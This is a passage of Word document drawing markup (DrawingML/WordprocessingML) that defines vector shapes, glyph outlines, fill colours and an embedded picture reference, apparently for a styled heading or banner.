                            <a:srgbClr val="385D88"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="58" name="Shape 58"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3682682" y="207218"/>
                            <a:ext cx="2425383" cy="375285"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2425383" h="375285">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2419033" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2425383" y="6350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2425383" y="13970"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2425383" y="26035"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2425383" y="349250"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2425383" y="361314"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2425383" y="368935"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2419033" y="375285"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="375285"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="349250"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2399348" y="349250"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2399348" y="26035"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="26035"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="385D88"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="59" name="Shape 59"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3682682" y="149432"/>
                            <a:ext cx="2483168" cy="490855"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2483168" h="490855">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2477453" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2483168" y="6350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2483168" y="13970"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2483168" y="26036"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2483168" y="464820"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2483168" y="478790"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2483168" y="484505"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2477453" y="490855"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="490855"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="464820"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2457133" y="464820"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2457133" y="26036"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="26036"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="385D88"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="60" name="Shape 60"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1240790" y="191979"/>
                            <a:ext cx="4884420" cy="405765"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="4884420" h="405765">
                                <a:moveTo>
                                  <a:pt x="0" y="405765"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4884420" y="405765"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4884420" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="57912" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="4F80BB"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="61" name="Picture 61"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId15"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="1270635" y="221468"/>
                            <a:ext cx="4824984" cy="347472"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="11571" name="Shape 11571"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1648360" y="332657"/>
                            <a:ext cx="19964" cy="65595"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="19964" h="65595">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="65595"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="65595"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="63" name="Shape 63"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1822362" y="331171"/>
                            <a:ext cx="35731" cy="68427"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="35731" h="68427">
                                <a:moveTo>
                                  <a:pt x="34595" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="35731" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="35731" y="13312"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25006" y="17424"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="22161" y="20180"/>
                                  <a:pt x="20764" y="23926"/>
                                  <a:pt x="20815" y="28663"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="35731" y="28663"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="35731" y="39294"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="20460" y="39294"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="20599" y="44437"/>
                                  <a:pt x="22212" y="48437"/>
                                  <a:pt x="25286" y="51295"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="35731" y="55191"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="35731" y="68427"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19471" y="65768"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="14618" y="63903"/>
                                  <a:pt x="10617" y="61106"/>
                                  <a:pt x="7468" y="57378"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2489" y="51409"/>
                                  <a:pt x="0" y="43878"/>
                                  <a:pt x="0" y="34772"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="23914"/>
                                  <a:pt x="3277" y="15392"/>
                                  <a:pt x="9804" y="9245"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="16345" y="3086"/>
                                  <a:pt x="24600" y="0"/>
                                  <a:pt x="34595" y="0"/>
                                </a:cubicBezTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="65" name="Shape 65"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1681265" y="309492"/>
                            <a:ext cx="44463" cy="90246"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="44463" h="90246">
                                <a:moveTo>
                                  <a:pt x="29197" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="29197" y="23165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="42837" y="23165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="42837" y="37008"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="29197" y="37008"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="29197" y="63436"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="29197" y="68796"/>
                                  <a:pt x="29324" y="71907"/>
                                  <a:pt x="29591" y="72796"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="29845" y="73685"/>
                                  <a:pt x="30442" y="74409"/>
                                  <a:pt x="31356" y="74981"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="32283" y="75565"/>
                                  <a:pt x="33414" y="75857"/>
                                  <a:pt x="34735" y="75857"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="36589" y="75857"/>
                                  <a:pt x="39256" y="75299"/>
                                  <a:pt x="42761" y="74181"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="44463" y="87643"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="39827" y="89383"/>
                                  <a:pt x="34569" y="90246"/>
                                  <a:pt x="28702" y="90246"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25095" y="90246"/>
                                  <a:pt x="21857" y="89713"/>
                                  <a:pt x="18974" y="88671"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="16078" y="87618"/>
                                  <a:pt x="13957" y="86258"/>
                                  <a:pt x="12611" y="84595"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11265" y="82918"/>
                                  <a:pt x="10325" y="80671"/>
                                  <a:pt x="9804" y="77826"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9385" y="75806"/>
                                  <a:pt x="9169" y="71730"/>
                                  <a:pt x="9169" y="65596"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9169" y="37008"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="37008"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="23165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9169" y="23165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9169" y="10135"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="29197"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66" name="Shape 66"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1738200" y="307701"/>
                            <a:ext cx="68694" cy="90551"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="68694" h="90551">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="33300"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="26403" y="26746"/>
                                  <a:pt x="34099" y="23470"/>
                                  <a:pt x="43053" y="23470"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="47638" y="23470"/>
                                  <a:pt x="51790" y="24219"/>
                                  <a:pt x="55474" y="25705"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="59169" y="27178"/>
                                  <a:pt x="61950" y="29070"/>
                                  <a:pt x="63830" y="31382"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="65697" y="33693"/>
                                  <a:pt x="66967" y="36246"/>
                                  <a:pt x="67665" y="39039"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="68351" y="41834"/>
                                  <a:pt x="68694" y="46190"/>
                                  <a:pt x="68694" y="52070"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="68694" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48730" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48730" y="55905"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="48730" y="49022"/>
                                  <a:pt x="48349" y="44665"/>
                                  <a:pt x="47600" y="42811"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="46838" y="40957"/>
                                  <a:pt x="45504" y="39484"/>
                                  <a:pt x="43586" y="38392"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="41669" y="37300"/>
                                  <a:pt x="39256" y="36754"/>
                                  <a:pt x="36373" y="36754"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="33058" y="36754"/>
                                  <a:pt x="30099" y="37452"/>
                                  <a:pt x="27495" y="38850"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24892" y="40259"/>
                                  <a:pt x="22987" y="42367"/>
                                  <a:pt x="21780" y="45186"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="20574" y="48006"/>
                                  <a:pt x="19964" y="52172"/>
                                  <a:pt x="19964" y="57696"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="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1572" name="Shape 11572"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1648360" y="307701"/>
                            <a:ext cx="19964" cy="16053"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="19964" h="16053">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="16053"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="16053"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="68" name="Shape 68"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1543559" y="307701"/>
                            <a:ext cx="82601" cy="90551"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="82601" h="90551">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="20460" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="63068" y="60478"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="63068" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="82601" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="82601" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="61506" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19533" y="31509"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19533" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="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69" name="Shape 69"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1858093" y="377374"/>
                            <a:ext cx="33675" cy="22365"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="33675" h="22365">
                                <a:moveTo>
                                  <a:pt x="13787" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="33675" y="2908"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="31109" y="9245"/>
                                  <a:pt x="27071" y="14071"/>
                                  <a:pt x="21559" y="17386"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="16047" y="20700"/>
                                  <a:pt x="9138" y="22365"/>
                                  <a:pt x="858" y="22365"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="22224"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="8989"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1061" y="9385"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="4198" y="9385"/>
                                  <a:pt x="6814" y="8648"/>
                                  <a:pt x="8948" y="7162"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11081" y="5690"/>
                                  <a:pt x="12694" y="3301"/>
                                  <a:pt x="13787" y="0"/>
                                </a:cubicBezTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="70" name="Shape 70"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1858093" y="331353"/>
                            <a:ext cx="35021" cy="39112"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="35021" h="39112">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="13925" y="2237"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="18352" y="3850"/>
                                  <a:pt x="22187" y="6269"/>
                                  <a:pt x="25432" y="9495"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="31922" y="15934"/>
                                  <a:pt x="35021" y="25802"/>
                                  <a:pt x="34729" y="39112"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="39112"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="28481"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="14917" y="28481"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="14777" y="23452"/>
                                  <a:pt x="13278" y="19642"/>
                                  <a:pt x="10446" y="17026"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="7602" y="14410"/>
                                  <a:pt x="4147" y="13102"/>
                                  <a:pt x="71" y="13102"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="13129"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="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71" name="Shape 71"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1903134" y="331171"/>
                            <a:ext cx="35731" cy="68427"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="35731" h="68427">
                                <a:moveTo>
                                  <a:pt x="34595" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="35731" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="35731" y="13312"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25006" y="17424"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="22161" y="20180"/>
                                  <a:pt x="20764" y="23926"/>
                                  <a:pt x="20815" y="28663"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="35731" y="28663"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="35731" y="39294"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="20460" y="39294"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="20599" y="44437"/>
                                  <a:pt x="22212" y="48437"/>
                                  <a:pt x="25286" y="51295"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="35731" y="55191"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="35731" y="68427"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19471" y="65768"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="14618" y="63903"/>
                                  <a:pt x="10617" y="61106"/>
                                  <a:pt x="7468" y="57378"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2489" y="51409"/>
                                  <a:pt x="0" y="43878"/>
                                  <a:pt x="0" y="34772"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="23914"/>
                                  <a:pt x="3277" y="15392"/>
                                  <a:pt x="9804" y="9245"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="16345" y="3086"/>
                                  <a:pt x="24600" y="0"/>
                                  <a:pt x="34595" y="0"/>
                                </a:cubicBezTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="72" name="Shape 72"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2556270" y="402570"/>
                            <a:ext cx="34658" cy="22252"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="34658" h="22252">
                                <a:moveTo>
                                  <a:pt x="76" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="22873" y="2414"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="23254" y="4725"/>
                                  <a:pt x="24130" y="6300"/>
                                  <a:pt x="25502" y="7176"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="27394" y="8408"/>
                                  <a:pt x="30378" y="9017"/>
                                  <a:pt x="34455" y="9017"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="34658" y="8982"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="34658" y="22252"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18837" y="20873"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="14303" y="19920"/>
                                  <a:pt x="10700" y="18492"/>
                                  <a:pt x="8026" y="16587"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2680" y="12777"/>
                                  <a:pt x="0" y="7951"/>
                                  <a:pt x="0" y="2108"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="1525"/>
                                  <a:pt x="25" y="826"/>
                                  <a:pt x="76" y="0"/>
                                </a:cubicBezTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
